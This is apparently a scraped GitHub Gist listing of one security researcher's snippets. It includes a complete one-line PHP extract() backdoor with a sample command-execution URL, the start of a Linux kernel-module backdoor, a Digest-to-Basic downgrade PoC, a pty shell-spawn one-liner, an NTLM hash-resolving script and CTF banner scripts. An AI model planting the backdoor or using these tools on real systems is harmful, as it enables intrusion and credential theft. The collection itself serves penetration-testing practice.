Skip to content

Instantly share code, notes, and snippets.

View leonjza's full-sized avatar
[hip, hip]

Leon Jacobs leonjza

[hip, hip]
589 followers · 0 following
View GitHub Profile
@leonjza
leonjza / dtob.py
Created June 26, 2013 16:29
Digest to Basic downgrade attack PoC plugin for proxpy (https://code.google.com/p/proxpy/)
# dtob.py
# Digest to Basic downgrade attack PoC plugin for proxpy (https://code.google.com/p/proxpy/)
#
# 2013 Leon Jacobs
# Licensed under IDC (I don't Care) license.
import base64
import hashlib
def headerCleanup(v):
@leonjza
leonjza / longurl.py
Last active September 22, 2022 18:36
longurl.py - A command line ShortURL Expander
#!/usr/bin/env python
# longurl.py ShortURL Expander
#
# 2013 Leon Jacobs
# Licensed under IDC (I don't Care) license.
import sys
import httplib
from urlparse import urlparse
@leonjza
leonjza / backup.php
Last active August 18, 2020 15:10
PHP extract() Backdoor RCE | Sample usage: foo.bar/backup.php?ctime=system&atime=ls -lah
<?php extract($_REQUEST); @die($ctime($atime));
@leonjza
leonjza / rooted.c
Created August 11, 2014 15:01
Linux Pluggable Kernel Module Backdoor
#include <linux/module.h> /* Needed by all modules */
#include <linux/kernel.h> /* Needed for KERN_INFO */
#include <linux/init.h> /* Needed for the macros */
/* For our shell ^_^ */
#include<linux/kmod.h>
int get_root (void)
{
@leonjza
leonjza / parsebanner.py
Created August 13, 2014 15:54
Flick parsebanner.py
#!/usr/bin/python
import base64
import binascii
# first empty string
string = ''
with open('banner.txt','r') as f:
for line in f.read():
string += line.rstrip()
@leonjza
leonjza / makebanner.py
Created August 13, 2014 15:57
Flick SSH Banner generator
import base64
string = 'tabupJievas8Knoj'
iterations = 15
string_parts = 80
current = 0
current_string = string
# encode with base64 encoding
@leonjza
leonjza / parsebanner_out
Created August 13, 2014 16:00
Flick parsebanner.py result
$ flick → python parsebanner.py
Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSWFJteFZVMjA1VjAxV2JETlhhMk0xVmpKS1IySkVUbGhoTVhCUVZteFZlRll5VGtsalJtaG9UVmhDVVZacVFtRlpWMDE1VTJ0V1ZXSkhhRzlVVmxaM1ZsWmFkR05GWkZSTmF6RTFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbUZrUjA1R1drWndWMDFFUlRGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm0xNFlVMHhXbk5YYlVaclVqQTFSMWRyV2xOVWJVcEdZMFZ3VjJKVVJYZFpla3BIVmpGT2RWVnRhRk5sYlhoWFZtMXdUMVF3TUhoalJscFlZbFZhY2xWcVFURlNNVlY1VFZSU1ZrMXJjRmhWTW5SM1ZqSktWVkpZWkZwbGEzQklWbXBHVDJSV1ZuUmhSazVzWWxob1dGWnRNSGhPUm14V1RVaG9XR0pyTlZsWmJGWmhZMnhXYzFWclpGaGlSM1F6VjJ0U1UxWnJNWEpqUm1oV1RXNVNNMVpxU2t0V1ZrcFpXa1p3VjFKV2NIbFdWRUpoVkRKT2RGSnJaRmhpVjNoVVdWUk9RMWRHV25STlZFSlhUV3hHTlZaWE5VOVhSMHBJVld4c1dtSkhhRlJXTUZwVFZqRndSMVJ0ZUdsU2JYY3hWa1phVTFVeFduSk5XRXBxVWxkNGFGVXdhRU5UUmxweFUydGFiRlpzV2xwWGExcDNZa2RGZWxGcmJGZFdNMEpJVmtSS1UxWXhWblZWYlhCVFlrVndWVlp0ZUc5Uk1XUnpWMjVLV0dKSFVtOVVWbHBYVGxaYVdHVkhkR2hpUlhBd1dWVm9UMVp0Um5KT1ZsSlhUVlp3V0ZreFdrdGpiVkpIVld4a2FWSnRPVE5XTW5oWFlqSkZlRmRZWkU1V1ZscFVXV3RrVTFsV1VsWlhiVVpzWWtad2VGVXlkREJXTVZweVYyeHdXbFpX
@leonjza
leonjza / resolvehash.sh
Created August 22, 2014 08:06
Hashcat results to user:pass
#!/bin/bash
# A, maybe-I-cant-read-docs script to resolve cracked NTLM
# hashes back to username.
# usage - ./resolvehash.sh hashdump cracked
while read LINE
do
# set the hash and password
HASH=$(echo "$LINE" | cut -d: -f1)
@leonjza
leonjza / ptyspawn.py
Created September 4, 2014 08:25
Python PTY spawner
python -c 'import pty; pty.spawn("/bin/bash")'
@leonjza
leonjza / bootprompt.sh
Created September 10, 2014 16:29
Show current IP on TTY login prompt
#!/bin/bash
#
# bootprompt.sh
#
# Description: Shows connected interface(s) at boot and related ip address(es) on tty login prompt
# Usage: Put it somewhere (ie. /etc/init.d/) and then add its full path entry to /etc/rc.local
DSTFILE="/etc/issue"
KEEPLINE=$(head -n 1 ${DSTFILE})
IFACE_UP=$(/sbin/ifconfig eth0 | grep 'Bcast:' -B1 | grep -v inet | grep -v - -- | awk '{print $1}')